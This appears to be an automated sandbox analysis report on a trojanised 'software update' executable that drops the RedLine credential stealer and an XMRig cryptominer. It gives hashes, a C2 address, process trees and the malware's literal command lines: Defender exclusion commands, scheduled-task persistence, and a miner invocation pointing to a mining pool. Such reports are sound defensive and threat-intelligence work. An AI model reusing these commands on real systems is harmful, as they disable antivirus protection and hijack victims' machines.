Analysis
- max time kernel: 151s
- max time network: 147s
- platform: windows7_x64
- resource: win7-en-20211014
- submitted: 26-10-2021 15:33
Static task: static1
Behavioral task: behavioral1
- Sample: Software updated by Dylox.exe
- Resource: win7-en-20211014
Behavioral task: behavioral2
- Sample: Software updated by Dylox.exe
- Resource: win10-en-20210920
Behavioral task: behavioral3
- Sample: Software-update-patc_828811790.exe
- Resource: win7-en-20210920
Behavioral task: behavioral4
- Sample: Software-update-patc_828811790.exe
- Resource: win10-en-20211014
Behavioral task: behavioral5
- Sample: open this if the doesn't work.exe
- Resource: win7-en-20210920
Behavioral task: behavioral6
- Sample: open this if the doesn't work.exe
- Resource: win10-en-20211014
General
- Target: Software updated by Dylox.exe
- Size: 3.2MB
- MD5: 6f78118b606c3c7c9bad1a9e0671cda8
- SHA1: 00abbc6a45d7009d8e166794289b39d0bb709ba5
- SHA256: 7be5baa4d9a45af1e6f15fdf6600537ed78e1694f9daa37741b5e8c3e58d7005
- SHA512: 77d474c0a67754e7f71ee1c932cd4f21bcbd1f94472ffd9c21cbe2c6242f5fa07f5fede82255b9037cff87fbde614225105db3b6a55be560dfc10ac74149d916
Malware Config
Extracted: redline
- Youtube
- 185.203.240.16:1249
Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload [5 IoCs]
Processes (resource | yara_rule):
- behavioral1/memory/832-81-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
- behavioral1/memory/832-82-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
- behavioral1/memory/832-83-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
- behavioral1/memory/832-84-0x0000000000418D32-mapping.dmp | family_redline
- behavioral1/memory/832-86-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline

Identifies VirtualBox via ACPI registry values (likely anti-VM) [2 TTPs]

XMRig Miner Payload [12 IoCs]
Processes (resource | yara_rule):
- behavioral1/memory/1756-218-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
- behavioral1/memory/1756-220-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
- behavioral1/memory/1756-221-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
- behavioral1/memory/1756-223-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
- behavioral1/memory/1756-227-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
- behavioral1/memory/1756-231-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
- behavioral1/memory/1756-233-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
- behavioral1/memory/1756-235-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
- behavioral1/memory/1756-234-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
- behavioral1/memory/1756-237-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
- behavioral1/memory/1756-238-0x000000014030F3F8-mapping.dmp | xmrig
- behavioral1/memory/1756-241-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig

Downloads MZ/PE file

Executes dropped EXE [8 IoCs]
Processes (pid | process):
- 632 | Datafile32.exe
- 1380 | Datafile64.exe
- 1820 | Server32.exe
- 832 | Server32.exe
- 1380 | services32.exe
- 1984 | services64.exe
- 1612 | sihost32.exe
- 1144 | sihost64.exe

Checks BIOS information in registry [2 TTPs, 6 IoCs]
BIOS information is often read in order to detect sandboxing environments.
Processes (description | ioc | process):
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Software updated by Dylox.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Software updated by Dylox.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Datafile64.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Datafile64.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | services64.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | services64.exe

Loads dropped DLL [12 IoCs]
Processes (pid | process):
- 656 | Software updated by Dylox.exe
- 656 | Software updated by Dylox.exe
- 656 | Software updated by Dylox.exe
- 656 | Software updated by Dylox.exe
- 656 | Software updated by Dylox.exe
- 1820 | Server32.exe
- 1056 | cmd.exe
- 1056 | cmd.exe
- 1656 | cmd.exe
- 1528 | conhost.exe
- 1528 | conhost.exe
- 1488 | conhost.exe

Reads user/profile data of web browsers [2 TTPs]
Infostealers often target stored browser data, which can include saved credentials etc.

Processes (resource | yara_rule):
- behavioral1/memory/656-58-0x0000000000B00000-0x0000000000B01000-memory.dmp | themida
- \Users\Admin\AppData\Local\Temp\Datafile64.exe | themida
- C:\Users\Admin\AppData\Local\Temp\Datafile64.exe | themida
- behavioral1/memory/1380-73-0x0000000000400000-0x0000000000EAE000-memory.dmp | themida
- C:\Users\Admin\AppData\Local\Temp\Datafile64.exe | themida
- \Windows\System32\services64.exe | themida
- C:\Windows\System32\services64.exe | themida
- behavioral1/memory/1984-158-0x0000000000400000-0x0000000000EAE000-memory.dmp | themida
- C:\Windows\system32\services64.exe | themida

Accesses cryptocurrency files/wallets, possible credential harvesting [2 TTPs]

Checks installed software on the system [1 TTPs]
Looks up Uninstall key entries in the registry to enumerate software on the system.
Checks whether UAC is enabled
Processes (description | ioc | process):
- Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | services64.exe
- Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Software updated by Dylox.exe
- Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Datafile64.exe

Legitimate hosting services abused for malware hosting/C2 [1 TTPs]

Drops file in System32 directory [12 IoCs]
Processes (description | ioc | process):
- File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
- File created | C:\Windows\system32\Microsoft\Libs\sihost64.exe | conhost.exe
- File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
- File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
- File opened for modification | C:\Windows\system32\services64.exe | conhost.exe
- File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
- File created | C:\Windows\system32\Microsoft\Libs\WR64.sys | conhost.exe
- File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
- File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
- File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
- File created | C:\Windows\system32\services64.exe | conhost.exe
- File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger [3 IoCs]
Processes (pid | process):
- 656 | Software updated by Dylox.exe
- 1380 | Datafile64.exe
- 1984 | services64.exe

Suspicious use of SetThreadContext [2 IoCs]
Processes (description | pid | process | target process):
- PID 1820 set thread context of 832 | 1820 | Server32.exe | Server32.exe
- PID 1488 set thread context of 1756 | 1488 | conhost.exe | nslookup.exe

Enumerates physical storage devices [1 TTPs]
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) [1 TTPs, 2 IoCs]
Schtasks is often used by malware for persistence or to perform post-infection execution.

Suspicious behavior: EnumeratesProcesses [33 IoCs]
Processes (pid | process):
- 832 | Server32.exe
- 1744 | conhost.exe
- 268 | powershell.exe
- 1284 | powershell.exe
- 1852 | conhost.exe
- 1908 | powershell.exe
- 996 | powershell.exe
- 1528 | conhost.exe
- 1528 | conhost.exe
- 1632 | powershell.exe
- 1648 | powershell.exe
- 1488 | conhost.exe
- 1488 | conhost.exe
- 1624 | powershell.exe
- 1600 | powershell.exe
- 1756 | nslookup.exe
- 1756 | nslookup.exe
- 1756 | nslookup.exe
- 1756 | nslookup.exe
- 1756 | nslookup.exe
- 1756 | nslookup.exe
- 1756 | nslookup.exe
- 1756 | nslookup.exe
- 1756 | nslookup.exe
- 1756 | nslookup.exe
- 1756 | nslookup.exe
- 1756 | nslookup.exe
- 1756 | nslookup.exe
- 1756 | nslookup.exe
- 1756 | nslookup.exe
- 1756 | nslookup.exe
- 1756 | nslookup.exe
- 1756 | nslookup.exe

Suspicious use of AdjustPrivilegeToken [16 IoCs]
Processes (description | pid | process):
- Token: SeDebugPrivilege | 656 | Software updated by Dylox.exe
- Token: SeDebugPrivilege | 832 | Server32.exe
- Token: SeDebugPrivilege | 1744 | conhost.exe
- Token: SeDebugPrivilege | 268 | powershell.exe
- Token: SeDebugPrivilege | 1284 | powershell.exe
- Token: SeDebugPrivilege | 1852 | conhost.exe
- Token: SeDebugPrivilege | 1908 | powershell.exe
- Token: SeDebugPrivilege | 996 | powershell.exe
- Token: SeDebugPrivilege | 1528 | conhost.exe
- Token: SeDebugPrivilege | 1632 | powershell.exe
- Token: SeDebugPrivilege | 1648 | powershell.exe
- Token: SeDebugPrivilege | 1488 | conhost.exe
- Token: SeDebugPrivilege | 1624 | powershell.exe
- Token: SeDebugPrivilege | 1600 | powershell.exe
- Token: SeLockMemoryPrivilege | 1756 | nslookup.exe
- Token: SeLockMemoryPrivilege | 1756 | nslookup.exe

Suspicious use of WriteProcessMemory [64 IoCs]
Processes (description | pid | process | target process):
- PID 656 wrote to memory of 632 | 656 | Software updated by Dylox.exe | Datafile32.exe
- PID 656 wrote to memory of 632 | 656 | Software updated by Dylox.exe | Datafile32.exe
- PID 656 wrote to memory of 632 | 656 | Software updated by Dylox.exe | Datafile32.exe
- PID 656 wrote to memory of 632 | 656 | Software updated by Dylox.exe | Datafile32.exe
- PID 656 wrote to memory of 1380 | 656 | Software updated by Dylox.exe | Datafile64.exe
- PID 656 wrote to memory of 1380 | 656 | Software updated by Dylox.exe | Datafile64.exe
- PID 656 wrote to memory of 1380 | 656 | Software updated by Dylox.exe | Datafile64.exe
- PID 656 wrote to memory of 1380 | 656 | Software updated by Dylox.exe | Datafile64.exe
- PID 656 wrote to memory of 1820 | 656 | Software updated by Dylox.exe | Server32.exe
- PID 656 wrote to memory of 1820 | 656 | Software updated by Dylox.exe | Server32.exe
- PID 656 wrote to memory of 1820 | 656 | Software updated by Dylox.exe | Server32.exe
- PID 656 wrote to memory of 1820 | 656 | Software updated by Dylox.exe | Server32.exe
- PID 1820 wrote to memory of 832 | 1820 | Server32.exe | Server32.exe
- PID 1820 wrote to memory of 832 | 1820 | Server32.exe | Server32.exe
- PID 1820 wrote to memory of 832 | 1820 | Server32.exe | Server32.exe
- PID 1820 wrote to memory of 832 | 1820 | Server32.exe | Server32.exe
- PID 1820 wrote to memory of 832 | 1820 | Server32.exe | Server32.exe
- PID 1820 wrote to memory of 832 | 1820 | Server32.exe | Server32.exe
- PID 1820 wrote to memory of 832 | 1820 | Server32.exe | Server32.exe
- PID 1820 wrote to memory of 832 | 1820 | Server32.exe | Server32.exe
- PID 1820 wrote to memory of 832 | 1820 | Server32.exe | Server32.exe
- PID 632 wrote to memory of 1744 | 632 | Datafile32.exe | conhost.exe
- PID 632 wrote to memory of 1744 | 632 | Datafile32.exe | conhost.exe
- PID 632 wrote to memory of 1744 | 632 | Datafile32.exe | conhost.exe
- PID 632 wrote to memory of 1744 | 632 | Datafile32.exe | conhost.exe
- PID 1744 wrote to memory of 1756 | 1744 | conhost.exe | cmd.exe
- PID 1744 wrote to memory of 1756 | 1744 | conhost.exe | cmd.exe
- PID 1744 wrote to memory of 1756 | 1744 | conhost.exe | cmd.exe
- PID 1756 wrote to memory of 268 | 1756 | cmd.exe | powershell.exe
- PID 1756 wrote to memory of 268 | 1756 | cmd.exe | powershell.exe
- PID 1756 wrote to memory of 268 | 1756 | cmd.exe | powershell.exe
- PID 1744 wrote to memory of 592 | 1744 | conhost.exe | cmd.exe
- PID 1744 wrote to memory of 592 | 1744 | conhost.exe | cmd.exe
- PID 1744 wrote to memory of 592 | 1744 | conhost.exe | cmd.exe
- PID 592 wrote to memory of 1648 | 592 | cmd.exe | schtasks.exe
- PID 592 wrote to memory of 1648 | 592 | cmd.exe | schtasks.exe
- PID 592 wrote to memory of 1648 | 592 | cmd.exe | schtasks.exe
- PID 1756 wrote to memory of 1284 | 1756 | cmd.exe | powershell.exe
- PID 1756 wrote to memory of 1284 | 1756 | cmd.exe | powershell.exe
- PID 1756 wrote to memory of 1284 | 1756 | cmd.exe | powershell.exe
- PID 1380 wrote to memory of 1852 | 1380 | Datafile64.exe | conhost.exe
- PID 1380 wrote to memory of 1852 | 1380 | Datafile64.exe | conhost.exe
- PID 1380 wrote to memory of 1852 | 1380 | Datafile64.exe | conhost.exe
- PID 1380 wrote to memory of 1852 | 1380 | Datafile64.exe | conhost.exe
- PID 1852 wrote to memory of 1668 | 1852 | conhost.exe | cmd.exe
- PID 1852 wrote to memory of 1668 | 1852 | conhost.exe | cmd.exe
- PID 1852 wrote to memory of 1668 | 1852 | conhost.exe | cmd.exe
- PID 1668 wrote to memory of 1908 | 1668 | cmd.exe | powershell.exe
- PID 1668 wrote to memory of 1908 | 1668 | cmd.exe | powershell.exe
- PID 1668 wrote to memory of 1908 | 1668 | cmd.exe | powershell.exe
- PID 1852 wrote to memory of 780 | 1852 | conhost.exe | cmd.exe
- PID 1852 wrote to memory of 780 | 1852 | conhost.exe | cmd.exe
- PID 1852 wrote to memory of 780 | 1852 | conhost.exe | cmd.exe
- PID 780 wrote to memory of 852 | 780 | cmd.exe | schtasks.exe
- PID 780 wrote to memory of 852 | 780 | cmd.exe | schtasks.exe
- PID 780 wrote to memory of 852 | 780 | cmd.exe | schtasks.exe
- PID 1668 wrote to memory of 996 | 1668 | cmd.exe | powershell.exe
- PID 1668 wrote to memory of 996 | 1668 | cmd.exe | powershell.exe
- PID 1668 wrote to memory of 996 | 1668 | cmd.exe | powershell.exe
- PID 1744 wrote to memory of 1056 | 1744 | conhost.exe | cmd.exe
- PID 1744 wrote to memory of 1056 | 1744 | conhost.exe | cmd.exe
- PID 1744 wrote to memory of 1056 | 1744 | conhost.exe | cmd.exe
- PID 1056 wrote to memory of 1380 | 1056 | cmd.exe | services32.exe
- PID 1056 wrote to memory of 1380 | 1056 | cmd.exe | services32.exe
Processes
[1] C:\Users\Admin\AppData\Local\Temp\Software updated by Dylox.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Software updated by Dylox.exe"
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\Datafile32.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\conhost.exe
        Command line: "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\cmd.exe
          Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
            - Drops file in System32 directory
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
            - Drops file in System32 directory
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\System32\cmd.exe
          Command line: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\schtasks.exe
            Command line: schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"
            - Creates scheduled task(s)
      [4] C:\Windows\System32\cmd.exe
          Command line: "cmd" cmd /c "C:\Users\Admin\services32.exe"
          - Loads dropped DLL
          - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\services32.exe
            Command line: C:\Users\Admin\services32.exe
            - Executes dropped EXE
          [6] C:\Windows\System32\conhost.exe
              Command line: "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\services32.exe"
              - Loads dropped DLL
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\System32\cmd.exe
                Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                  - Drops file in System32 directory
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                  - Drops file in System32 directory
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
            [7] C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                - Executes dropped EXE
              [8] C:\Windows\System32\conhost.exe
                  Command line: "C:\Windows\System32\\conhost.exe" "/sihost32"
  [2] C:\Users\Admin\AppData\Local\Temp\Datafile64.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
      - Executes dropped EXE
      - Checks BIOS information in registry
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\conhost.exe
        Command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\cmd.exe
          Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
            - Drops file in System32 directory
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
            - Drops file in System32 directory
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\System32\cmd.exe
          Command line: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\schtasks.exe
            Command line: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
            - Creates scheduled task(s)
      [4] C:\Windows\System32\cmd.exe
          Command line: "cmd" cmd /c "C:\Windows\system32\services64.exe"
          - Loads dropped DLL
        [5] C:\Windows\system32\services64.exe
            Command line: C:\Windows\system32\services64.exe
            - Executes dropped EXE
            - Checks BIOS information in registry
            - Checks whether UAC is enabled
            - Suspicious use of NtSetInformationThreadHideFromDebugger
          [6] C:\Windows\System32\conhost.exe
              Command line: "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
              - Loads dropped DLL
              - Drops file in System32 directory
              - Suspicious use of SetThreadContext
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\System32\cmd.exe
                Command line: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                  - Drops file in System32 directory
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                  - Drops file in System32 directory
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\system32\Microsoft\Libs\sihost64.exe
                Command line: "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                - Executes dropped EXE
              [8] C:\Windows\System32\conhost.exe
                  Command line: "C:\Windows\System32\conhost.exe" "/sihost64"
            [7] C:\Windows\System32\nslookup.exe
                Command line: C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=50 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6NiP86mD8cW+f6jtmqjmEDLY00XM3Bo2fOksM1LJ6Dgf" --cinit-stealth-targets="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" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
  [2] C:\Users\Admin\AppData\Local\Temp\Server32.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Server32.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of SetThreadContext
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\Server32.exe
        Command line: C:\Users\Admin\AppData\Local\Temp\Server32.exe
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015MD5
842d5b37c0e9afb213da7f9cf7c3f7c8
SHA17d27e2bd37ec3878a2b00fd99c6f29f9bab9a5b8
SHA2563aa67817143a918fa420c7646002e2a6c932dca93719870ce4c440556504f38a
SHA5127e91085f6b914f711b1871704286fed5dfaba6d2a874da4149b6b637231375fc3df96ede7f66f193d0f696a848ebb8d12a6efc30801fe395282b1583a1574f65
-
C:\Users\Admin\AppData\Local\Temp\Datafile32.exeMD5
55f246c4f670bddc2e1c6fab66fb9af8
SHA1b2737bf54e19008f7230830c987e9cc45ca9dba7
SHA2564c8b5fba12ebb583a444831e1a9759ef724f2d9f37c595e8afb22dbbdabf6bc8
SHA512c124240ded2271bc125e88ea6f4cc4625915809a13d66ebf8c32677436f043340b92bc50283835d212c9b40edcea5d458c2663a1d5be5038154b1eb1560628fe
-
C:\Users\Admin\AppData\Local\Temp\Datafile32.exeMD5
55f246c4f670bddc2e1c6fab66fb9af8
SHA1b2737bf54e19008f7230830c987e9cc45ca9dba7
SHA2564c8b5fba12ebb583a444831e1a9759ef724f2d9f37c595e8afb22dbbdabf6bc8
SHA512c124240ded2271bc125e88ea6f4cc4625915809a13d66ebf8c32677436f043340b92bc50283835d212c9b40edcea5d458c2663a1d5be5038154b1eb1560628fe
-
C:\Users\Admin\AppData\Local\Temp\Datafile64.exeMD5
f87ec0d92f1e1c57e281c3b7207264a4
SHA1452ee705af24c36bb2235fc969dd122ede448e7b
SHA2565e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
SHA5128e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
-
C:\Users\Admin\AppData\Local\Temp\Datafile64.exeMD5
f87ec0d92f1e1c57e281c3b7207264a4
SHA1452ee705af24c36bb2235fc969dd122ede448e7b
SHA2565e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
SHA5128e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
-
C:\Users\Admin\AppData\Local\Temp\Server32.exeMD5
7190f3a53c0e5247c2b7ece197acddea
SHA1495b35f241df11b61ddc781ac64e2a3f24d6915b
SHA256646277abb30792f37cece3371b61387555cd16874ba01f59b3e19120467b9ad3
SHA512cde3a5d415f51f302d793e1c9fcc11768f3bfea7cf0544fccb3210a3cebc0d3437d3104ae896ebf95dd0bcf3e7d0639ef43a69cdf97015a9591d3b6beb121aad
-
C:\Users\Admin\AppData\Local\Temp\Server32.exeMD5
7190f3a53c0e5247c2b7ece197acddea
SHA1495b35f241df11b61ddc781ac64e2a3f24d6915b
SHA256646277abb30792f37cece3371b61387555cd16874ba01f59b3e19120467b9ad3
SHA512cde3a5d415f51f302d793e1c9fcc11768f3bfea7cf0544fccb3210a3cebc0d3437d3104ae896ebf95dd0bcf3e7d0639ef43a69cdf97015a9591d3b6beb121aad
-
C:\Users\Admin\AppData\Local\Temp\Server32.exeMD5
7190f3a53c0e5247c2b7ece197acddea
SHA1495b35f241df11b61ddc781ac64e2a3f24d6915b
SHA256646277abb30792f37cece3371b61387555cd16874ba01f59b3e19120467b9ad3
SHA512cde3a5d415f51f302d793e1c9fcc11768f3bfea7cf0544fccb3210a3cebc0d3437d3104ae896ebf95dd0bcf3e7d0639ef43a69cdf97015a9591d3b6beb121aad
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exeMD5
a48e4ecd100871e98f3b6128f9b37187
SHA18adf645a05d8ede551aadaaf51a37a47071497b9
SHA256b141d0c63cfd6c373f4721eba43014c7ce9e1d3b10aabcefe17750abb9b55283
SHA512bd481ddabcce4b9a1cbc95f0067058937effde93cc02c69785fc80ecdc99417753cf1696c1a1e337578256e98763e7e975845fd6aca71d4c3610ddd7eb20cda1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
1720323b3e29d8f84f81e60a3804b50f
SHA1a0663c423dc04e6bd27860098a366d31050355fb
SHA2569b534ea77071ec85d773282fe24059b0a562fcc12d1a87a63805d6a3a13712dd
SHA51205a430e9581df45792464e7cb5c2cf0135493fe3db00272f8cee373d5320a3e70fa27966e4fa450f3d87804bf758edac21d3260a29488bd15289566ccdd289f8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
1720323b3e29d8f84f81e60a3804b50f
SHA1a0663c423dc04e6bd27860098a366d31050355fb
SHA2569b534ea77071ec85d773282fe24059b0a562fcc12d1a87a63805d6a3a13712dd
SHA51205a430e9581df45792464e7cb5c2cf0135493fe3db00272f8cee373d5320a3e70fa27966e4fa450f3d87804bf758edac21d3260a29488bd15289566ccdd289f8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
3872795f9f8124fd92e8dc72ce10b584
SHA1686bf1cd35e099a11e4155bbd97d13f1f76edfec
SHA256125a4bc29e0a59c2eea5f866585218b660ad6bc64f97c6def2f60e45251922fa
